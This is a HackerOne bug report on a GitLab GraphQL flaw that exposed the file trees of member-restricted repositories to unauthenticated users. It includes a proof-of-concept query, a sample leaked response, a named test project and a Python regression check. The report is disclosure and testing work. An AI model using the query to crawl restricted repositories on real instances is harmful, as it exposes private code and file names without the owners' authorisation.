Restricted repo trees can be scanned via GraphQL
HackerOne report #614453 by xanbanx
on 2019-06-14, assigned to jmatos_bgtvf
Summary
GitLab added a new GraphQL API to query the repo tree. However, this API does not respect the user permissions. For repos with restricted access, any user who has access to the project, but not to the repo, can query the repo tree via the GraphQL API.
This happens for:
- Public projects with repositories set to "Project Members only"
- Internal projects with repositories set to "Project Members only"
- Private projects where guest users do not have access to the repository
Steps to reproduce
- Create a public repo, with the repository restricted to project members only and push some code
- As an unauthenticated user, perform the following GraphQL request. You can do that, for example, using GitLab's built-in GraphQL explorer.
{
  project(fullPath: "<namespace>/<project-name>") {
    id
    repository {
      empty
      exists
      rootRef
      tree {
        blobs {
          edges {
            node {
              id
              flatPath
              path
              type
              webUrl
            }
          }
        }
      }
    }
  }
}
- Although you are unauthenticated and repository access is restricted to project members only, you receive the repository tree, for example:
{
  "data": {
    "project": {
      "id": "gid://gitlab/Project/1",
      "repository": {
        "empty": false,
        "exists": true,
        "rootRef": "master",
        "tree": {
          "blobs": {
            "edges": [
              {
                "node": {
                  "id": "f754ff5ab666e7bce419a8184ec9ba54c15852b2",
                  "flatPath": "Readme.md",
                  "path": "Readme.md",
                  "type": "blob",
                  "webUrl": "https://example.gitlab.net/test/test-repo/blob/88340bca02ab25c8356258f9540d281295cdda8/README.md"
                }
              },
              {
                "node": {
                  "id": "536aca34dbae6b2bca83bebdcba83543c9546f0",
                  "flatPath": "secret",
                  "path": "secret",
                  "type": "blob",
                  "webUrl": "https://example.gitlab.net/test/test-repo/blob/88340bca02ab25c8356258f9540d281295cdda8/secret"
                }
              }
            ]
          }
        }
      }
    }
  }
}
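The reproduction steps above amount to a regression check an instance administrator can run after upgrading: send the same tree query without credentials and confirm that no blob paths come back. The script below is an added example, not part of the report or of GitLab's code. It assumes GitLab's GraphQL endpoint at /api/graphql and the `project(fullPath: ID!)` argument type; the two embedded responses are constructed, one mirroring the leaking response shown above and one showing what an authorised-only response looks like, so the check runs offline.

```python
"""Regression check: does an unauthenticated GraphQL query expose a restricted repo tree?"""
import json
import urllib.request
from typing import Any, Dict, List, Optional

# Same fields as the report's query, but the project path is passed as a
# GraphQL variable instead of being spliced into the query string.
REPO_TREE_QUERY = """
query RepoTree($fullPath: ID!) {
  project(fullPath: $fullPath) {
    id
    repository {
      empty
      exists
      rootRef
      tree {
        blobs {
          edges {
            node { path type }
          }
        }
      }
    }
  }
}
"""


def build_request(full_path: str) -> Dict[str, Any]:
    """JSON body for POST /api/graphql."""
    return {"query": REPO_TREE_QUERY, "variables": {"fullPath": full_path}}


def fetch_response(base_url: str, full_path: str, token: Optional[str] = None) -> Dict[str, Any]:
    """Send the query; with token=None it runs as an unauthenticated user.
    (Not exercised offline; base_url is e.g. https://gitlab.example.test.)"""
    body = json.dumps(build_request(full_path)).encode()
    headers = {"Content-Type": "application/json"}
    if token:
        headers["Authorization"] = f"Bearer {token}"
    req = urllib.request.Request(f"{base_url.rstrip('/')}/api/graphql", data=body, headers=headers)
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)


def leaked_paths(response: Dict[str, Any]) -> List[str]:
    """Return every blob path present in a tree response.

    For a viewer without repository access the correct answer is an empty
    list: `project` may be null, `repository` may be null, or the tree may
    carry no blobs. Anything else means the authorisation check is missing."""
    project = (response.get("data") or {}).get("project") or {}
    repository = project.get("repository") or {}
    tree = repository.get("tree") or {}
    edges = (tree.get("blobs") or {}).get("edges") or []
    return [e["node"]["path"] for e in edges if e.get("node") and "path" in e["node"]]


# Constructed response mirroring the leak in the report (paths only).
LEAKY_RESPONSE = {"data": {"project": {"id": "gid://gitlab/Project/1", "repository": {
    "empty": False, "exists": True, "rootRef": "master",
    "tree": {"blobs": {"edges": [
        {"node": {"path": "Readme.md", "type": "blob"}},
        {"node": {"path": "secret", "type": "blob"}},
    ]}}}}}}

# Constructed response for a viewer the repository field is hidden from.
FIXED_RESPONSE = {"data": {"project": {"id": "gid://gitlab/Project/1", "repository": None}}}


def is_vulnerable(response: Dict[str, Any]) -> bool:
    """True when an unauthenticated tree query still returns blob paths."""
    return bool(leaked_paths(response))


if __name__ == "__main__":
    for name, resp in (("leaky", LEAKY_RESPONSE), ("fixed", FIXED_RESPONSE)):
        print(name, "->", "LEAK" if is_vulnerable(resp) else "ok", leaked_paths(resp))
```

Run it against a real instance by calling `fetch_response(base_url, "<namespace>/<project-name>")` with no token on a project whose repository is restricted to project members, then pass the result to `is_vulnerable`; a non-empty path list from an anonymous session is the finding described in this report.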
Examples
This happens on GitLab.com, tested on 12.0.0-pre d56096df9a5. You can use the repo wter23/repo-restricted on gitlab.com to reproduce the behavior. This public project has its repository restricted to project members only, so the repository does not show up in the user interface. However, GraphQL allows you to crawl the repository tree.
What is the current bug behavior?
Unauthorized users have access to the project tree.
What is the expected correct behavior?
Unauthorized users should not have access to the project tree.
Impact
Unauthorized users, who do not have access to the repo, can crawl the project tree and therefore have access to private information. I consider the repo as the heart of a GitLab project and therefore consider this as a "high" report.